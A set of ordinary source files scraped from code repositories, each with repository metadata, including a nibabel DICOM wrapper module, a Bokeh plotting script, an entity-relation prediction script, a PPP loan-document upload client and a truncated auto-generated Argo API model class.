9d2526cae7bd917776f5296b7f9d34911fff966f | b56ecb98160317ac8fc17d41b033432bf2c85155 | /Source/Pre-processing/data_analysis.py | 8ac61178eb1638df814e32afeb14060b9fd2a321 | [] | no_license | harika2050/Samsung | 19c2a52482a852a06181448b2121dfc73e384ba2 | aa798078684dcee2009f95504ad3a7f65fb31447 | refs/heads/master | 2020-07-26T20:57:23.079598 | 2019-10-23T06:09:02 | 2019-10-23T06:09:02 | 208,763,862 | 0 | 0 | null | 2019-09-16T09:41:53 | 2019-09-16T09:41:53 | null | UTF-8 | Python | false | false | 187 | py | import collections
import re
import sys
import time
from collections import Counter
from nltk import ngrams
ngram_counts = Counter(ngrams(bigtxt.split(), 2))
ngram_counts.most_common(10) | [
"root@instance-1.asia-south1-b.c.swift-icon-249114.internal"
] | root@instance-1.asia-south1-b.c.swift-icon-249114.internal |
21eb5886424c9971925aa7c5d3ea745ac1508863 | 3b6c20ca891807eb5533552837cf0614d878d284 | /code/buildnet/predict.py | 35aed0cad04d5ed3246514626b2fa8dd30bccd02 | [] | no_license | stupidjoey/baidu_bigdata | 99d296f833c9dcb9da414efeb4053e8fdd391e6a | 80504e16a226f74f8fd7e849fd8b58f412900a35 | refs/heads/master | 2021-01-10T03:30:14.178984 | 2015-08-10T10:34:34 | 2015-08-10T10:34:34 | 36,113,209 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,935 | py | # !/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import os
import re
import pickle
def main():
starttime = datetime.datetime.now()
path = os.path.abspath('.')
path = path.split('/')
basepath = "/".join(path[:-2])
netfile = open( os.path.join(basepath,'data/relation_net.pkl'))
relation_net = pickle.load(netfile)
netfile.close()
target_ent_hanyu = u'林正英'
target_ent_pinyin = 'linzhengying'
predictpath = os.path.join(basepath,'data/predict.%s' % target_ent_pinyin )
with open(predictpath,'w') as f:
ent_set = set()
layer = 1
layer_max_count = [10,3,2]
# layer_max_count = [15,6,4]
target_ent_list = [target_ent_hanyu]
while layer <= 3 and len(target_ent_list) != 0:
new_target_ent_list = []
for target_ent in target_ent_list:
ent_set.add(target_ent)
entity2_set = relation_net[target_ent].keys()
layercount = min(len(entity2_set), layer_max_count[layer-1])
tempcount = 1
for entity2 in entity2_set:
if entity2 in ent_set:
continue
relation = relation_net[target_ent][entity2]
writeline = '%s\t%s\t%s\n' % (relation.encode('utf-8'),target_ent.encode('utf-8'),entity2.encode('utf-8'))
f.write(writeline)
print writeline
new_target_ent_list.append(entity2)
ent_set.add(entity2)
tempcount += 1
if tempcount > layercount:
break
target_ent_list = new_target_ent_list[:]
layer += 1
print 'finished ...'
endtime = datetime.datetime.now()
print 'elapsed time is %f' %(endtime - starttime).seconds
if __name__=='__main__':
main() | [
"stupidzy1991@gmail.com"
] | stupidzy1991@gmail.com |
f5fc8e92c120225f2d0fffe4c1995837f5ae5838 | 0a3b930df060f54ae260508a1cb09e68a4e01020 | /nibabel/nicom/dicomwrappers.py | 883541b09cbd8ea85be291b8670b84b767fdbcc3 | [] | no_license | llcmgh/slicer_tract_querier | bc8b49bea2c64fa578d18dcaaed5d0e1cfd0d4ff | 41c96fb079eb9e046ac3efa45f82ac2dce7dcc5d | refs/heads/master | 2016-09-09T17:23:53.620717 | 2014-01-24T00:52:16 | 2014-01-24T00:52:16 | 14,962,648 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 31,391 | py | """ Classes to wrap DICOM objects and files
The wrappers encapsulate the capabilities of the different DICOM
formats.
They also allow dictionary-like access to named fields.
For calculated attributes, we return None where needed data is missing.
It seemed strange to raise an error during attribute processing, other
than an AttributeError - breaking the 'properties manifesto'. So, any
processing that needs to raise an error, should be in a method, rather
than in a property, or property-like thing.
"""
import operator
import numpy as np
from . import csareader as csar
from .dwiparams import B2q, nearest_pos_semi_def, q2bg
from ..volumeutils import BinOpener
from ..onetime import setattr_on_read as one_time
class WrapperError(Exception):
pass
class WrapperPrecisionError(WrapperError):
pass
def wrapper_from_file(file_like, *args, **kwargs):
""" Create DICOM wrapper from `file_like` object
Parameters
----------
file_like : object
filename string or file-like object, pointing to a valid DICOM
file readable by ``pydicom``
\*args : positional
args to ``dicom.read_file`` command.
\*\*kwargs : keyword
args to ``dicom.read_file`` command. ``force=True`` might be a
likely keyword argument.
Returns
-------
dcm_w : ``dicomwrappers.Wrapper`` or subclass
DICOM wrapper corresponding to DICOM data type
"""
import dicom
with BinOpener(file_like) as fobj:
dcm_data = dicom.read_file(fobj, *args, **kwargs)
return wrapper_from_data(dcm_data)
def wrapper_from_data(dcm_data):
""" Create DICOM wrapper from DICOM data object
Parameters
----------
dcm_data : ``dicom.dataset.Dataset`` instance or similar
Object allowing attribute access, with DICOM attributes.
Probably a dataset as read by ``pydicom``.
Returns
-------
dcm_w : ``dicomwrappers.Wrapper`` or subclass
DICOM wrapper corresponding to DICOM data type
"""
sop_class = dcm_data.get('SOPClassUID')
# try to detect what type of dicom object to wrap
if sop_class == '1.2.840.10008.5.1.4.1.1.4.1': # Enhanced MR Image Storage
# currently only Philips is using Enhanced Multiframe DICOM
return MultiframeWrapper(dcm_data)
# Check for Siemens DICOM format types
# Only Siemens will have data for the CSA header
csa = csar.get_csa_header(dcm_data)
if csa is None:
return Wrapper(dcm_data)
if csar.is_mosaic(csa):
# Mosaic is a "tiled" image
return MosaicWrapper(dcm_data, csa)
# Assume data is in a single slice format per file
return SiemensWrapper(dcm_data, csa)
class Wrapper(object):
""" Class to wrap general DICOM files
Methods:
* get_affine()
* get_data()
* get_pixel_array()
* is_same_series(other)
* __getitem__ : return attributes from `dcm_data`
* get(key[, default]) - as usual given __getitem__ above
Attributes and things that look like attributes:
* dcm_data : object
* image_shape : tuple
* image_orient_patient : (3,2) array
* slice_normal : (3,) array
* rotation_matrix : (3,3) array
* voxel_sizes : tuple length 3
* image_position : sequence length 3
* slice_indicator : float
* series_signature : tuple
"""
is_csa = False
is_mosaic = False
is_multiframe = False
b_matrix = None
q_vector = None
b_value = None
b_vector = None
def __init__(self, dcm_data):
""" Initialize wrapper
Parameters
----------
dcm_data : object
object should allow 'get' and '__getitem__' access. Usually this
will be a ``dicom.dataset.Dataset`` object resulting from reading a
DICOM file, but a dictionary should also work.
"""
self.dcm_data = dcm_data
@one_time
def image_shape(self):
""" The array shape as it will be returned by ``get_data()``
"""
shape = (self.get('Rows'), self.get('Columns'))
if None in shape:
return None
return shape
@one_time
def image_orient_patient(self):
""" Note that this is _not_ LR flipped """
iop = self.get('ImageOrientationPatient')
if iop is None:
return None
# Values are python Decimals in pydicom 0.9.7
iop = np.array(list(map(float, iop)))
return np.array(iop).reshape(2, 3).T
@one_time
def slice_normal(self):
iop = self.image_orient_patient
if iop is None:
return None
# iop[:, 0] is column index cosine, iop[:, 1] is row index cosine
return np.cross(iop[:, 1], iop[:, 0])
@one_time
def rotation_matrix(self):
""" Return rotation matrix between array indices and mm
Note that we swap the two columns of the 'ImageOrientPatient'
when we create the rotation matrix. This is takes into account
the slightly odd ij transpose construction of the DICOM
orientation fields - see doc/theory/dicom_orientaiton.rst.
"""
iop = self.image_orient_patient
s_norm = self.slice_normal
if None in (iop, s_norm):
return None
R = np.eye(3)
# np.fliplr(iop) gives matrix F in
# doc/theory/dicom_orientation.rst The fliplr accounts for the
# fact that the first column in ``iop`` refers to changes in
# column index, and the second to changes in row index.
R[:, :2] = np.fliplr(iop)
R[:, 2] = s_norm
# check this is in fact a rotation matrix. Error comes from compromise
# motivated in ``doc/source/notebooks/ata_error.ipynb``, and from
# discussion at https://github.com/nipy/nibabel/pull/156
if not np.allclose(np.eye(3), np.dot(R, R.T), atol=5e-5):
raise WrapperPrecisionError('Rotation matrix not nearly orthogonal')
return R
@one_time
def voxel_sizes(self):
""" voxel sizes for array as returned by ``get_data()``
"""
# pix space gives (row_spacing, column_spacing). That is, the
# mm you move when moving from one row to the next, and the mm
# you move when moving from one column to the next
pix_space = self.get('PixelSpacing')
if pix_space is None:
return None
zs = self.get('SpacingBetweenSlices')
if zs is None:
zs = self.get('SliceThickness')
if zs is None:
zs = 1
# Protect from python decimals in pydicom 0.9.7
zs = float(zs)
pix_space = list(map(float, pix_space))
return tuple(pix_space + [zs])
@one_time
def image_position(self):
""" Return position of first voxel in data block
Parameters
----------
None
Returns
-------
img_pos : (3,) array
position in mm of voxel (0,0) in image array
"""
ipp = self.get('ImagePositionPatient')
if ipp is None:
return None
# Values are python Decimals in pydicom 0.9.7
return np.array(list(map(float, ipp)))
@one_time
def slice_indicator(self):
""" A number that is higher for higher slices in Z
Comparing this number between two adjacent slices should give a
difference equal to the voxel size in Z.
See doc/theory/dicom_orientation for description
"""
ipp = self.image_position
s_norm = self.slice_normal
if None in (ipp, s_norm):
return None
return np.inner(ipp, s_norm)
@one_time
def instance_number(self):
""" Just because we use this a lot for sorting """
return self.get('InstanceNumber')
@one_time
def series_signature(self):
""" Signature for matching slices into series
We use `signature` in ``self.is_same_series(other)``.
Returns
-------
signature : dict
with values of 2-element sequences, where first element is
value, and second element is function to compare this value
with another. This allows us to pass things like arrays,
that might need to be ``allclose`` instead of equal
"""
# dictionary with value, comparison func tuple
signature = {}
eq = operator.eq
for key in ('SeriesInstanceUID',
'SeriesNumber',
'ImageType',
'SequenceName',
'EchoNumbers'):
signature[key] = (self.get(key), eq)
signature['image_shape'] = (self.image_shape, eq)
signature['iop'] = (self.image_orient_patient, none_or_close)
signature['vox'] = (self.voxel_sizes, none_or_close)
return signature
def __getitem__(self, key):
""" Return values from DICOM object"""
if not key in self.dcm_data:
raise KeyError('"%s" not in self.dcm_data' % key)
return self.dcm_data.get(key)
def get(self, key, default=None):
""" Get values from underlying dicom data """
return self.dcm_data.get(key, default)
def get_affine(self):
""" Return mapping between voxel and DICOM coordinate system
Parameters
----------
None
Returns
-------
aff : (4,4) affine
Affine giving transformation between voxels in data array and
mm in the DICOM patient coordinate system.
"""
# rotation matrix already accounts for the ij transpose in the
# DICOM image orientation patient transform. So. column 0 is
# direction cosine for changes in row index, column 1 is
# direction cosine for changes in column index
orient = self.rotation_matrix
# therefore, these voxel sizes are in the right order (row,
# column, slice)
vox = self.voxel_sizes
ipp = self.image_position
if None in (orient, vox, ipp):
raise WrapperError('Not enough information for affine')
aff = np.eye(4)
aff[:3, :3] = orient * np.array(vox)
aff[:3, 3] = ipp
return aff
def get_pixel_array(self):
""" Return unscaled pixel array from DICOM """
data = self.dcm_data.get('pixel_array')
if data is None:
raise WrapperError('Cannot find data in DICOM')
return data
def get_data(self):
""" Get scaled image data from DICOMs
We return the data as DICOM understands it, first dimension is
rows, second dimension is columns
Returns
-------
data : array
array with data as scaled from any scaling in the DICOM
fields.
"""
return self._scale_data(self.get_pixel_array())
def is_same_series(self, other):
""" Return True if `other` appears to be in same series
Parameters
----------
other : object
object with ``series_signature`` attribute that is a
mapping. Usually it's a ``Wrapper`` or sub-class instance.
Returns
-------
tf : bool
True if `other` might be in the same series as `self`, False
otherwise.
"""
# compare signature dictionaries. The dictionaries each contain
# comparison rules, we prefer our own when we have them. If a
# key is not present in either dictionary, assume the value is
# None.
my_sig = self.series_signature
your_sig = other.series_signature
my_keys = set(my_sig)
your_keys = set(your_sig)
# we have values in both signatures
for key in my_keys.intersection(your_keys):
v1, func = my_sig[key]
v2, _ = your_sig[key]
if not func(v1, v2):
return False
# values present in one or the other but not both
for keys, sig in ((my_keys - your_keys, my_sig),
(your_keys - my_keys, your_sig)):
for key in keys:
v1, func = sig[key]
if not func(v1, None):
return False
return True
def _scale_data(self, data):
# depending on pydicom and dicom files, values might need casting from Decimal to float
scale = float(self.get('RescaleSlope', 1))
offset = float(self.get('RescaleIntercept', 0))
return self._apply_scale_offset(data, scale, offset)
def _apply_scale_offset(self, data, scale, offset):
# a little optimization. If we are applying either the scale or
# the offset, we need to allow upcasting to float.
if scale != 1:
if offset == 0:
return data * scale
return data * scale + offset
if offset != 0:
return data + offset
return data
@one_time
def b_value(self):
""" Return b value for diffusion or None if not available
"""
q_vec = self.q_vector
if q_vec is None:
return None
return q2bg(q_vec)[0]
@one_time
def b_vector(self):
""" Return b vector for diffusion or None if not available
"""
q_vec = self.q_vector
if q_vec is None:
return None
return q2bg(q_vec)[1]
class MultiframeWrapper(Wrapper):
"""Wrapper for Enhanced MR Storage SOP Class
tested with Philips' Enhanced DICOM implementation
Attributes
----------
is_multiframe : boolean
Identifies `dcmdata` as multi-frame
frames : sequence
A sequence of ``dicom.dataset.Dataset`` objects populated by the
``dicom.dataset.Dataset.PerFrameFunctionalGroupsSequence`` attribute
shared : object
The first (and only) ``dicom.dataset.Dataset`` object from a
``dicom.dataset.Dataset.SharedFunctionalgroupSequence``.
Methods
-------
image_shape(self)
image_orient_patient(self)
voxel_sizes(self)
image_position(self)
series_signature(self)
get_data(self)
"""
is_multiframe = True
def __init__(self, dcm_data):
"""Initializes MultiframeWrapper
Parameters
----------
dcm_data : object
object should allow 'get' and '__getitem__' access. Usually this
will be a ``dicom.dataset.Dataset`` object resulting from reading a
DICOM file, but a dictionary should also work.
"""
Wrapper.__init__(self, dcm_data)
self.dcm_data = dcm_data
self.frames = dcm_data.get('PerFrameFunctionalGroupsSequence')
try:
self.frames[0]
except TypeError:
raise WrapperError("PerFrameFunctionalGroupsSequence is empty.")
try:
self.shared = dcm_data.get('SharedFunctionalGroupsSequence')[0]
except TypeError:
raise WrapperError("SharedFunctionalGroupsSequence is empty.")
self._shape = None
@one_time
def image_shape(self):
"""The array shape as it will be returned by ``get_data()``"""
rows, cols = self.get('Rows'), self.get('Columns')
if None in (rows, cols):
raise WrapperError("Rows and/or Columns are empty.")
# Check number of frames
n_frames = self.get('NumberOfFrames')
assert len(self.frames) == n_frames
frame_indices = np.array(
[frame.FrameContentSequence[0].DimensionIndexValues
for frame in self.frames])
n_dim = frame_indices.shape[1] + 1
# Check there is only one multiframe stack index
if np.any(np.diff(frame_indices[:, 0])):
raise WrapperError("File contains more than one StackID. Cannot handle multi-stack files")
# Store frame indices
self._frame_indices = frame_indices[:, 1:]
if n_dim < 4: # 3D volume
return rows, cols, n_frames
# More than 3 dimensions
ns_unique = [len(np.unique(row)) for row in self._frame_indices.T]
shape = (rows, cols) + tuple(ns_unique)
n_vols = np.prod(shape[3:])
if n_frames != n_vols * shape[2]:
raise WrapperError("Calculated shape does not match number of frames.")
return tuple(shape)
@one_time
def image_orient_patient(self):
"""
Note that this is _not_ LR flipped
"""
try:
iop = self.shared.PlaneOrientationSequence[0].ImageOrientationPatient
except AttributeError:
try:
iop = self.frames[0].PlaneOrientationSequence[0].ImageOrientationPatient
except AttributeError:
raise WrapperError("Not enough information for image_orient_patient")
if iop is None:
return None
iop = np.array(list(map(float, iop)))
return np.array(iop).reshape(2, 3).T
@one_time
def voxel_sizes(self):
''' Get i, j, k voxel sizes '''
try:
pix_measures = self.shared.PixelMeasuresSequence[0]
except AttributeError:
try:
pix_measures = self.frames[0].PixelMeasuresSequence[0]
except AttributeError:
raise WrapperError("Not enough data for pixel spacing")
pix_space = pix_measures.PixelSpacing
try:
zs = pix_measures.SliceThickness
except AttributeError:
zs = self.get('SpacingBetweenSlices')
if zs is None:
raise WrapperError('Not enough data for slice thickness')
# Ensure values are float rather than Decimal
return tuple(map(float, list(pix_space) + [zs]))
@one_time
def image_position(self):
try:
ipp = self.shared.PlanePositionSequence[0].ImagePositionPatient
except AttributeError:
try:
ipp = self.frames[0].PlanePositionSequence[0].ImagePositionPatient
except AttributeError:
raise WrapperError('Cannot get image position from dicom')
if ipp is None:
return None
return np.array(list(map(float, ipp)))
@one_time
def series_signature(self):
signature = {}
eq = operator.eq
for key in ('SeriesInstanceUID',
'SeriesNumber',
'ImageType'):
signature[key] = (self.get(key), eq)
signature['image_shape'] = (self.image_shape, eq)
signature['iop'] = (self.image_orient_patient, none_or_close)
signature['vox'] = (self.voxel_sizes, none_or_close)
return signature
def get_data(self):
shape = self.image_shape
if shape is None:
raise WrapperError('No valid information for image shape')
data = self.get_pixel_array()
# Roll frames axis to last
data = data.transpose((1, 2, 0))
# Sort frames with first index changing fastest, last slowest
sorted_indices = np.lexsort(self._frame_indices.T)
data = data[..., sorted_indices]
data = data.reshape(shape, order='F')
return self._scale_data(data)
def _scale_data(self, data):
pix_trans = getattr(
self.frames[0], 'PixelValueTransformationSequence', None)
if pix_trans is None:
return super(MultiframeWrapper, self)._scale_data(data)
scale = float(pix_trans[0].RescaleSlope)
offset = float(pix_trans[0].RescaleIntercept)
return self._apply_scale_offset(data, scale, offset)
class SiemensWrapper(Wrapper):
""" Wrapper for Siemens format DICOMs
Adds attributes:
* csa_header : mapping
* b_matrix : (3,3) array
* q_vector : (3,) array
"""
is_csa = True
def __init__(self, dcm_data, csa_header=None):
""" Initialize Siemens wrapper
The Siemens-specific information is in the `csa_header`, either
passed in here, or read from the input `dcm_data`.
Parameters
----------
dcm_data : object
object should allow 'get' and '__getitem__' access. If `csa_header`
is None, it should also be possible to extract a CSA header from
`dcm_data`. Usually this will be a ``dicom.dataset.Dataset`` object
resulting from reading a DICOM file. A dict should also work.
csa_header : None or mapping, optional
mapping giving values for Siemens CSA image sub-header. If
None, we try and read the CSA information from `dcm_data`.
If this fails, we fall back to an empty dict.
"""
super(SiemensWrapper, self).__init__(dcm_data)
if dcm_data is None:
dcm_data = {}
self.dcm_data = dcm_data
if csa_header is None:
csa_header = csar.get_csa_header(dcm_data)
if csa_header is None:
csa_header = {}
self.csa_header = csa_header
@one_time
def slice_normal(self):
#The std_slice_normal comes from the cross product of the directions
#in the ImageOrientationPatient
std_slice_normal = super(SiemensWrapper, self).slice_normal
csa_slice_normal = csar.get_slice_normal(self.csa_header)
if std_slice_normal is None and csa_slice_normal is None:
return None
elif std_slice_normal is None:
return np.array(csa_slice_normal)
elif csa_slice_normal is None:
return std_slice_normal
else:
#Make sure the two normals are very close to parallel unit vectors
dot_prod = np.dot(csa_slice_normal, std_slice_normal)
assert np.allclose(np.fabs(dot_prod), 1.0, atol=1e-5)
#Use the slice normal computed with the cross product as it will
#always be the most orthogonal, but take the sign from the CSA
#slice normal
if dot_prod < 0:
return -std_slice_normal
else:
return std_slice_normal
@one_time
def series_signature(self):
""" Add ICE dims from CSA header to signature """
signature = super(SiemensWrapper, self).series_signature
ice = csar.get_ice_dims(self.csa_header)
if not ice is None:
ice = ice[:6] + ice[8:9]
signature['ICE_Dims'] = (ice, lambda x, y: x == y)
return signature
@one_time
def b_matrix(self):
""" Get DWI B matrix referring to voxel space
Parameters
----------
None
Returns
-------
B : (3,3) array or None
B matrix in *voxel* orientation space. Returns None if this is
not a Siemens header with the required information. We return
None if this is a b0 acquisition
"""
hdr = self.csa_header
# read B matrix as recorded in CSA header. This matrix refers to
# the space of the DICOM patient coordinate space.
B = csar.get_b_matrix(hdr)
if B is None: # may be not diffusion or B0 image
bval_requested = csar.get_b_value(hdr)
if bval_requested is None:
return None
if bval_requested != 0:
raise csar.CSAError('No B matrix and b value != 0')
return np.zeros((3, 3))
# rotation from voxels to DICOM PCS, inverted to give the rotation
# from DPCS to voxels. Because this is an orthonormal matrix, its
# transpose is its inverse
R = self.rotation_matrix.T
# because B results from V dot V.T, the rotation B is given by R dot
# V dot V.T dot R.T == R dot B dot R.T
B_vox = np.dot(R, np.dot(B, R.T))
# fix presumed rounding errors in the B matrix by making it positive
# semi-definite.
return nearest_pos_semi_def(B_vox)
@one_time
def q_vector(self):
""" Get DWI q vector referring to voxel space
Parameters
----------
None
Returns
-------
q: (3,) array
Estimated DWI q vector in *voxel* orientation space. Returns
None if this is not (detectably) a DWI
"""
B = self.b_matrix
if B is None:
return None
# We've enforced more or less positive semi definite with the
# b_matrix routine
return B2q(B, tol=1e-8)
class MosaicWrapper(SiemensWrapper):
""" Class for Siemens mosaic format data
Mosaic format is a way of storing a 3D image in a 2D slice - and
it's as simple as you'd imagine it would be - just storing the slices
in a mosaic similar to a light-box print.
We need to allow for this when getting the data and (because of an
idiosyncrasy in the way Siemens stores the images) calculating the
position of the first voxel.
Adds attributes:
* n_mosaic : int
* mosaic_size : float
"""
is_mosaic = True
def __init__(self, dcm_data, csa_header=None, n_mosaic=None):
""" Initialize Siemens Mosaic wrapper
The Siemens-specific information is in the `csa_header`, either
passed in here, or read from the input `dcm_data`.
Parameters
----------
dcm_data : object
object should allow 'get' and '__getitem__' access. If `csa_header`
is None, it should also be possible for to extract a CSA header from
`dcm_data`. Usually this will be a ``dicom.dataset.Dataset`` object
resulting from reading a DICOM file. A dict should also work.
csa_header : None or mapping, optional
mapping giving values for Siemens CSA image sub-header.
n_mosaic : None or int, optional
number of images in mosaic. If None, try to get this number
from `csa_header`. If this fails, raise an error
"""
SiemensWrapper.__init__(self, dcm_data, csa_header)
if n_mosaic is None:
try:
n_mosaic = csar.get_n_mosaic(self.csa_header)
except KeyError:
pass
if n_mosaic is None or n_mosaic == 0:
raise WrapperError('No valid mosaic number in CSA '
'header; is this really '
'Siemens mosiac data?')
self.n_mosaic = n_mosaic
self.mosaic_size = np.ceil(np.sqrt(n_mosaic))
@one_time
def image_shape(self):
""" Return image shape as returned by ``get_data()`` """
# reshape pixel slice array back from mosaic
rows = self.get('Rows')
cols = self.get('Columns')
if None in (rows, cols):
return None
mosaic_size = self.mosaic_size
return (int(rows / mosaic_size),
int(cols / mosaic_size),
self.n_mosaic)
@one_time
def image_position(self):
""" Return position of first voxel in data block
Adjusts Siemens mosaic position vector for bug in mosaic format
position. See ``dicom_mosaic`` in doc/theory for details.
Parameters
----------
None
Returns
-------
img_pos : (3,) array
position in mm of voxel (0,0,0) in Mosaic array
"""
ipp = super(MosaicWrapper, self).image_position
# mosaic image size
md_rows, md_cols = (self.get('Rows'), self.get('Columns'))
iop = self.image_orient_patient
pix_spacing = self.get('PixelSpacing')
if None in (ipp, md_rows, md_cols, iop, pix_spacing):
return None
# PixelSpacing values are python Decimal in pydicom 0.9.7
pix_spacing = np.array(list(map(float, pix_spacing)))
# size of mosaic array before rearranging to 3D.
md_rc = np.array([md_rows, md_cols])
# size of slice array after reshaping to 3D
rd_rc = md_rc / self.mosaic_size
# apply algorithm for undoing mosaic translation error - see
# ``dicom_mosaic`` doc
vox_trans_fixes = (md_rc - rd_rc) / 2
# flip IOP field to refer to rows then columns index change -
# see dicom_orientation doc
Q = np.fliplr(iop) * pix_spacing
return ipp + np.dot(Q, vox_trans_fixes[:, None]).ravel()
def get_data(self):
""" Get scaled image data from DICOMs
Resorts data block from mosaic to 3D
Returns
-------
data : array
array with data as scaled from any scaling in the DICOM
fields.
Notes
-----
The apparent image in the DICOM file is a 2D array that consists of
blocks, that are the output 2D slices. Let's call the original array
the *slab*, and the contained slices *slices*. The slices are of pixel
dimension ``n_slice_rows`` x ``n_slice_cols``. The slab is of pixel
dimension ``n_slab_rows`` x ``n_slab_cols``. Because the arrangement of
blocks in the slab is defined as being square, the number of blocks per
slab row and slab column is the same. Let ``n_blocks`` be the number of
blocks contained in the slab. There is also ``n_slices`` - the number
of slices actually collected, some number <= ``n_blocks``. We have the
value ``n_slices`` from the 'NumberOfImagesInMosaic' field of the
Siemens private (CSA) header. ``n_row_blocks`` and ``n_col_blocks`` are
therefore given by ``ceil(sqrt(n_slices))``, and ``n_blocks`` is
``n_row_blocks ** 2``. Also ``n_slice_rows == n_slab_rows /
n_row_blocks``, etc. Using these numbers we can therefore reconstruct
the slices from the 2D DICOM pixel array.
"""
shape = self.image_shape
if shape is None:
raise WrapperError('No valid information for image shape')
n_slice_rows, n_slice_cols, n_mosaic = shape
n_slab_rows = self.mosaic_size
n_blocks = n_slab_rows ** 2
data = self.get_pixel_array()
v4 = data.reshape(n_slab_rows, n_slice_rows,
n_slab_rows, n_slice_cols)
# move the mosaic dims to the end
v4 = v4.transpose((1, 3, 0, 2))
# pool mosaic-generated dims
v3 = v4.reshape((n_slice_rows, n_slice_cols, n_blocks))
# delete any padding slices
v3 = v3[..., :n_mosaic]
return self._scale_data(v3)
def none_or_close(val1, val2, rtol=1e-5, atol=1e-6):
""" Match if `val1` and `val2` are both None, or are close
Parameters
----------
val1 : None or array-like
val2 : None or array-like
rtol : float, optional
Relative tolerance; see ``np.allclose``
atol : float, optional
Absolute tolerance; see ``np.allclose``
Returns
-------
tf : bool
True iff (both `val1` and `val2` are None) or (`val1` and `val2`
are close arrays, as detected by ``np.allclose`` with parameters
`rtol` and `atal`).
Examples
--------
>>> none_or_close(None, None)
True
>>> none_or_close(1, None)
False
>>> none_or_close(None, 1)
False
>>> none_or_close([1,2], [1,2])
True
>>> none_or_close([0,1], [0,2])
False
"""
if (val1, val2) == (None, None):
return True
if None in (val1, val2):
return False
return np.allclose(val1, val2, rtol, atol)
| [
"lichenliang@Lichens-MacBook-Air.local"
] | lichenliang@Lichens-MacBook-Air.local |
90af3f4c9e051e9b5c8261ceac9771dd3b23fc42 | d7b83b50027c34bdbd0b2bad3a8b3d0937dc9229 | /bokeh_project/bokeh_display_export.py | 488179c36e51395f42338d7a5da5239e9b0125d6 | [] | no_license | 6oghyan/data_science_for_everyone | be1468f236708a9384f40e6f8fbf5f97db905c6b | 3065e8e4c1112913493958687d0af99301a1773d | refs/heads/main | 2023-08-30T11:08:04.728007 | 2021-11-03T18:34:39 | 2021-11-03T18:34:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 392 | py | from bokeh.plotting import figure, output_file, save
from bokeh.io import export_svg
x = list(range(11))
y = [abs(10 - i) for i in x]
# output to static HTML file
output_file(filename="HERE IS MY NEW FILE.html", title="HTML FILE")
p = figure(sizing_mode="stretch_width", max_width=500, max_height=250)
p.circle(x, y, fill_color="blue", size=10)
export_svg(p, filename="ANOTHER PLOT.svg") | [
"markumreed@gmail.com"
] | markumreed@gmail.com |
60880a65d205b0aa41d8738ea420c2ebfb5ebad8 | 84b584038550cb75f1863574ae646c2a287a3fcc | /PPPForgivenessSDK/loan_documents.py | f6643aaa32f1ce5e24ee3b891ed91b70c810dbf6 | [] | no_license | rsmith0717/lc-coding-challenge | 5a07171920a3b24d4d847f58dc9ede89154857c3 | de308fe72d6c8705a90cdfca9c03e009e70846f1 | refs/heads/master | 2023-03-02T12:51:33.726056 | 2021-02-15T18:28:27 | 2021-02-15T18:28:27 | 339,170,389 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 935 | py | import json
from .base_api import BaseApi, UnknownException
class LoanDocumentsApi(BaseApi):
def create(self, name, document_type, etran_loan, document):
"""
:param name:
:param document_type:
:param etran_loan:
:param document:
:return:
"""
http_method = "POST"
endpoint = "ppp_loan_documents/"
uri = self.client.api_uri + endpoint
params = {'name': name, 'document_type': document_type, 'etran_loan': etran_loan}
files = {'document': open(document, 'rb')}
try:
response = self.execute(http_method=http_method,
url=uri,
data=params,
files=files)
return {'status': response.status_code,
'data': json.loads(response.text)}
except:
raise UnknownException | [
"rodericks@ineedamaid.com"
] | rodericks@ineedamaid.com |
e5c52f925a0fab9388230c7329c217af4f1a1907 | 8b8fa2f20a33b4c6f02f0138f8f77d578e927fd2 | /argo/workflows/client/models/v1_pod_affinity_term.py | 9030434dfd3d44163e50d3eda6f1981b88d6a291 | [
"Apache-2.0",
"MIT"
] | permissive | jakedsouza/argo-client-python | 1fa3c8489d961090f6ee3604befb9b695ac8c91b | 12e3159b297ed16479adf67c5e5daffab6e83897 | refs/heads/master | 2023-01-21T14:06:04.115524 | 2020-11-28T22:48:26 | 2020-11-28T22:48:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,260 | py | # coding: utf-8
"""
Argo Server API
You can get examples of requests and responses by using the CLI with `--gloglevel=9`, e.g. `argo list --gloglevel=9` # noqa: E501
The version of the OpenAPI document: v2.11.8
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from argo.workflows.client.configuration import Configuration
class V1PodAffinityTerm(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'label_selector': 'V1LabelSelector',
'namespaces': 'list[str]',
'topology_key': 'str'
}
attribute_map = {
'label_selector': 'labelSelector',
'namespaces': 'namespaces',
'topology_key': 'topologyKey'
}
def __init__(self, label_selector=None, namespaces=None, topology_key=None, local_vars_configuration=None): # noqa: E501
"""V1PodAffinityTerm - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._label_selector = None
self._namespaces = None
self._topology_key = None
self.discriminator = None
if label_selector is not None:
self.label_selector = label_selector
if namespaces is not None:
self.namespaces = namespaces
self.topology_key = topology_key
@property
def label_selector(self):
"""Gets the label_selector of this V1PodAffinityTerm. # noqa: E501
:return: The label_selector of this V1PodAffinityTerm. # noqa: E501
:rtype: V1LabelSelector
"""
return self._label_selector
@label_selector.setter
def label_selector(self, label_selector):
"""Sets the label_selector of this V1PodAffinityTerm.
:param label_selector: The label_selector of this V1PodAffinityTerm. # noqa: E501
:type: V1LabelSelector
"""
self._label_selector = label_selector
@property
def namespaces(self):
"""Gets the namespaces of this V1PodAffinityTerm. # noqa: E501
namespaces specifies which namespaces the labelSelector applies to (matches against); null or empty list means \"this pod's namespace\" # noqa: E501
:return: The namespaces of this V1PodAffinityTerm. # noqa: E501
:rtype: list[str]
"""
return self._namespaces
@namespaces.setter
def namespaces(self, namespaces):
"""Sets the namespaces of this V1PodAffinityTerm.
namespaces specifies which namespaces the labelSelector applies to (matches against); null or empty list means \"this pod's namespace\" # noqa: E501
:param namespaces: The namespaces of this V1PodAffinityTerm. # noqa: E501
:type: list[str]
"""
self._namespaces = namespaces
@property
